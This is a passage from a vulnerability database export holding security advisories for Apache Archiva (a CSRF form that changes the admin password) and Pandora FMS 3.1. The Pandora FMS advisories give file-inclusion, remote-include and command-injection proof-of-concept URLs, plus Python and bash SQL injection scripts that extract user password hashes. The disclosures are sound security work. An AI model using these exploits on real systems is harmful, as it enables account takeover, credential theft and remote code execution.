"ANATOLIA SECURITY ADVISORY\n--------------------------------------\n\n### ADVISORY INFO ###\n+ Title: Apache Archiva Cross-site Request Forgery Vulnerability\n+ Advisory URL: http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt\n+ Advisory ID: 2010-001\n+ Versions: Archiva 1.0 to 1.3.1\n+ Date: 29/09/2010\n+ CVE-ID: CVE-2010-3449\n+ Vendor: The Apache Software Foundation\n+ Impact: Gaining Administrator Privileges\n+ CWE-ID: 352 \n+ Credit: Anatolia Security \n+ References: http://archiva.apache.org/security.html\n\n\n### VULNERABLE PRODUCT ###\n+ Apache Archiva: \"Apache Archiva is an extensible repository management software that helps taking care of your \nown personal or enterprise-wide build artifact repository. It is the perfect companion for build tools such as \nMaven, Continuum, and ANT. Archiva offers several capabilities, amongst which remote repository proxying, security \naccess management, build artifact storage, delivery, browsing, indexing and usage reporting, extensible scanning \nfunctionality... and many more!\"\n+ Homepage: http://archiva.apache.org\n\n\n\n### VULNERABILITY DETAILS ###\n+ Description: Apache Archiva affects from Cross-site Request Forgery. Application don't check which form sends\ncredentials. Technically, attacker can create a specially crafted page and force archiva administrators to view it \nand change their credentials. For prevention from CSRF vulnerabilities, application needs anti-csrf token, captcha\nand asking old password for action like change password. Vulnerability patched by the Apache Archiva Team.\n\n+ Exploit/POC: http://www.anatoliasecurity.com/exploits/archiva-csrf-poc.txt\n\n\n<html>\n<head>\n<title> Apache Archiva CSRF PoC </title>\n</head>\n<body>\n<form id=\"userEditForm\" name=\"useredit\" action=\"http://archiva:8080/archiva/security/useredit.action\" method=\"post\">\n <input type=\"hidden\" name=\"user.username\" value=\"admin\" id=\"userEditForm_user_username\"/>\n <input type=\"hidden\" name=\"user.fullName\" value=\"OWNED0DAY\" id=\"userEditForm_user_fullName\"/>\n <input type=\"hidden\" name=\"user.email\" value=\"0day@zer0day.com\" id=\"userEditForm_user_email\"/>\n <input type=\"hidden\" name=\"user.password\" value=\"1337owned\" id=\"userEditForm_user_password\"/>\n <input type=\"hidden\" name=\"user.confirmPassword\" value=\"1337owned\" id=\"userEditForm_user_confirmPassword\"/>\n <input type=\"hidden\" name=\"user.locked\" value=\"true\" id=\"userEditForm_user_locked\"/>\n <input type=\"hidden\" name=\"__checkbox_user.locked\" value=\"true\" />\n <input type=\"hidden\" name=\"user.passwordChangeRequired\" value=\"true\" id=\"userEditForm_user_passwordChangeRequired\"/>\n <input type=\"hidden\" name=\"__checkbox_user.passwordChangeRequired\" value=\"true\" />\n <input type=\"hidden\" name=\"username\" value=\"admin\" id=\"userEditForm_username\"/>\n <input type=\"hidden\" id=\"userEditForm__submit\" name=\"method:submit\" value=\"Update\"/>\n</form>\n<script type=\"text/javascript\">\n document.forms[0].submit();\n</script>\n</body>\n</html>", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T16:03:37", "description": "[+] Introduction\r\n \r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n \r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n \r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n \r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n \r\n5) Path Traversal:\r\n \r\n5.1 - PHP File Inclusion (or RFI/LFI: Remote/Local file inclusion) -\r\nCVE-2010-4281 -CVE-2010-4282 - CVSS 8.5/10\r\n \r\nParameter 'page' of ajax.php is not properly sanitizing user-supplied\r\ninput. The function safe_url_extraclean is filtering ':' character, and\r\nit doesn't allow to use the string \"http://\"; to create urls, but allows\r\n'/' character and an attacker could reference remote resources via\r\nWindows UNC files, using //servername//resource/file\r\n \r\nNote that the first check in safe_url_extraclean is filtering '://', so\r\nwe can bypass the filter easily doing http://http://url, and it only\r\nstrip the first protocol://. However, the last preg_replace strips the :\r\ncharacter.\r\n \r\nProof of concept:\r\n \r\nUNC: http://servername/pandora_console/ajax.php?page=//server/share/test\r\n \r\nAs well, ajax.php allows to include any php file in the disk\r\n \r\nfilesystem:\r\nhttp://servername/pandora_console/ajax.php?page=../../../../../directory/file\r\n \r\nCharacter %00 is not allowed due safe_url_extraclean function filtering,\r\nand is not possible to include other files distinct that php files, but\r\nstill allows . and / characters.\r\n \r\n \r\n5.2 - PHP File Inclusion (or RFI Remote file inclusion) - CVE-2010-4283\r\n- - CVSS 7.9/10\r\n \r\nAn attacker can inject arbitrary PHP code and execute it remotely due\r\nargv[1] parameter is not filtered in file pandora_diag.php.\r\n \r\nPoC:\r\nhttp://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php%00\r\n \r\nNote: that issue needs register_globals set to On to be exploitable.\r\n \r\n \r\n5.3 - Path traversal & Local file inclusion vulnerabilities -\r\nCVE-2010-4282 - CVSS 6.8/10\r\n \r\nAn attacker can include arbitrary files of the filesystem via id\r\nparameter in file pandora_help.php.\r\n \r\n \r\nSnippet of vulnerable code:\r\n \r\n 24 $id = get_parameter ('id');\r\n 25\r\n 26 /* Possible file locations */\r\n 27 $files = array\r\n($config[\"homedir\"].\"/include/help/\".$config[\"language\"].\"/help_\".$id.\".php\",\r\n 28\r\n$config[\"homedir\"].ENTERPRISE_DIR.\"/include/help/\".$config[\"language\"].\"/help_\".$id.\".php\",\r\n 29\r\n$config[\"homedir\"].ENTERPRISE_DIR.\"/include/help/en/help_\".$id.\".php\",\r\n 30 $config[\"homedir\"].\"/include/help/en/help_\".$id.\".php\");\r\n 31 $help_file = '';\r\n 32 foreach ($files as $file) {\r\n 33 if (file_exists ($file)) {\r\n 34 $help_file = $file;\r\n 35 break;\r\n 36 }\r\n 37 }\r\n...\r\n 62 require_once ($help_file);\r\n \r\n \r\nProof of concept:\r\n \r\nhttp://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini%00\r\n \r\nThis code is platform dependent bug, you can read more at\r\nhttp://seclists.org/fulldisclosure/2010/Jul/137\r\nOnly works in windows systems, an attacker can include local file using\r\n../ characters due parameter id is not filtered\r\nIf magic_quotes_gpc is Off, arbitrary files can be included, like\r\nboot.ini using NULL character (%00), if not, only php files are allowed\r\n \r\n \r\n5.4 - Path traversal & Arbitrary write and delete files - CVE-2010-4282\r\n- - CVSS 8.0/10\r\n \r\nIn file operation/agentes/networkmap.php the 'layout' parameter is\r\nhandled in an insecure way and it is used to write and delete files on\r\nthe filesystem.\r\nAn attacker could use this parameter to write in arbitrary paths and\r\neven remove files.\r\n \r\nSnippet of vulnerable code:\r\n \r\n32 $layout = (string) get_parameter ('layout', 'radial');\r\n...\r\n137 $filename_map = $config[\"attachment_store\"].\"/networkmap_\".$layout;\r\n138 $filename_img = \"attachment/networkmap_\".$layout.\"_\".$font_size;\r\n139 $filename_dot = $config[\"attachment_store\"].\"/networkmap_\".$layout;\r\n...\r\n157 $fh = @fopen ($filename_dot, 'w');\r\n158 if ($fh === false) {\r\n159 $result = false;\r\n160 } else {\r\n161 fwrite ($fh, $graph);\r\n162 $cmd = \"$filter -Tcmapx -o\".$filename_map.\" -Tpng\r\n- -o\".$filename_img.\" \".$filename_dot;\r\n163 $result = system ($cmd);\r\n164 fclose ($fh);\r\n165 unlink ($filename_dot);\r\n166 }\r\n...\r\n178 require ($filename_map);\r\n \r\n \r\nCharacter sequences '../' could be used to write files (due -o parameter\r\nin lines 162 and 163), as well as potentially remove files (line 157,\r\n161 and 165) or include them (line 178)\r\nAs well like in 5.3 this issue is only exploitable in windows\r\nenvironments because the same reason.\r\n \r\n \r\n[+] Impact\r\n \r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n \r\n \r\n[+] Systems affected\r\n \r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n \r\n \r\n[+] Solution\r\n \r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n \r\n \r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n \r\n \r\n[+] Timeline\r\n \r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n \r\n \r\n[+] References\r\n \r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n \r\n \r\n[+] Credits\r\n \r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\n\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n \r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n\r\n-----END PGP SIGNATURE-----", "published": "2014-07-01T00:00:00", "title": "Pandora FMS <= 3.1 Path Traversal and LFI", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4281", "CVE-2010-4282", "CVE-2010-4283"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70309", "id": "SSV:70309", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T16:00:25", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Pandora FMS <= 3.1 - SQL Injection", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4280"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70307", "id": "SSV:70307", "sourceData": "\n [+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n3) SQL Injection - CVE-2010-4280 - CVSS 8.5/10\r\n\r\nThe parameter id_group when get_agents_group_json is equal to 1 is\r\nvulnerable to SQL Injection attacks.\r\n\r\nPoC:\r\nhttp://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario\r\n\r\n\r\nExploit:\r\n\r\n# Pandora Flexible Monitoring System SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Gets the list of users and password from the database\r\n#\r\n#configure cookie&host before use it\r\n#usage\r\n#python sqlinj_users.py\r\n#admin:75b756ff2785ea8bb9ae02c13b6a71f1\r\n#...\r\n\r\nimport json\r\nimport urllib2\r\n\r\nheaders = {"Cookie": "PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o"}\r\n\r\nurl = "http://HOST/pandora_console/ajax.php";\r\nurl+=\r\n"?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1"\r\nurl+=\r\n"/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario"\r\n\r\nreq = urllib2.Request(url,headers=headers)\r\nresp = urllib2.urlopen(req)\r\n\r\nusers = json.read(resp.read())\r\nfor user in users:\r\n print(user["id_agente"]+":"+user["nombre"])\r\n\r\n\r\nThe fix to these kind of issues was the implementation of a generic\r\nfilter against sql injection. A proper fix is planned for a major version.\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n-----END PGP SIGNATURE-----\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70307"}, {"lastseen": "2017-11-19T16:02:15", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Pandora FMS <= 3.1 - Blind SQL Injection", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4280"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70308", "id": "SSV:70308", "sourceData": "\n [+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10\r\n\r\nThe parameter group_id of operation/agentes/estado_agente.php is\r\nvulnerable to blind sql injection.\r\n\r\n\r\nPoC:\r\nhttp://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281\r\n\r\n\r\nExploit:\r\n\r\n#!/bin/bash\r\n# Pandora Flexible Monitoring System Blind SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Gets the md5 hash password from a specific user\r\n#\r\n#configure host,cookie&group_id before use it\r\n#usage\r\n#$ ./getpassword.sh\r\n#74b444ff2785ea8bb9ae02c13b6a71f1\r\n\r\nHOST="HOST"\r\nTARGET_USER="0x61646d696e" #admin\r\nPATTERN="Interval"\r\nCOOKIE="rq842tci6e5ib7t918c6sv1ml4"\r\nCHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v\r\nw x y z)\r\nGROUP_ID=2\r\n\r\nj=1\r\nwhile [[ $j -lt 33 ]]; do\r\n i=0\r\n while [[ $i -lt ${#CHARSET[ () ]} ]]; do\r\n c=$(printf '%d' "'${CHARSET[$i]}")\r\n\r\nURL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281";;\r\n curl $URL --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q\r\n$PATTERN;\r\n if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;\r\n let i++\r\n done;\r\n if [[ $i -eq ${#CHARSET[ () ]} ]]; then echo "Something went wrong!";\r\nexit 1; fi\r\n let j++;\r\ndone\r\necho\r\nexit 0\r\n\r\n\r\nThe fix to these kind of issues was the implementation of a generic\r\nfilter against sql injection. A proper fix is planned for a major version.\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n-----END PGP SIGNATURE-----\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70308"}, {"lastseen": "2017-11-19T15:59:43", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Pandora FMS <= 3.1 OS Command Injection", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4278"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70306", "id": "SSV:70306", "sourceData": "\n [+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n2) OS Command Injection - CVE-2010-4278 - CVSS 9/10\r\n\r\nThe layout parameter in file operation/agentes/networkmap.php is not\r\nproperly filtered and allows an attacker to inject OS commands.\r\n\r\nSnippet of vulnerable code (file operation/agentes/networkmap.php):\r\n\r\n32 $layout = (string) get_parameter ('layout', 'radial');\r\n...\r\n137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;\r\n138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;\r\n139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;\r\n...\r\n162 $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng\r\n- -o".$filename_img." ".$filename_dot;\r\n163 $result = system ($cmd);\r\n\r\nPoC:\r\n\r\nhttp://servername/pandora_console/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;uname%20-a;\r\nhttp://servername/pandora_console/index.php?login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;id;\r\n\r\nIf we use vulnerability #1 (that permits bypass the authentication\r\nsystem and login as admin) with this issue, the CVSS will be 10/10.\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: 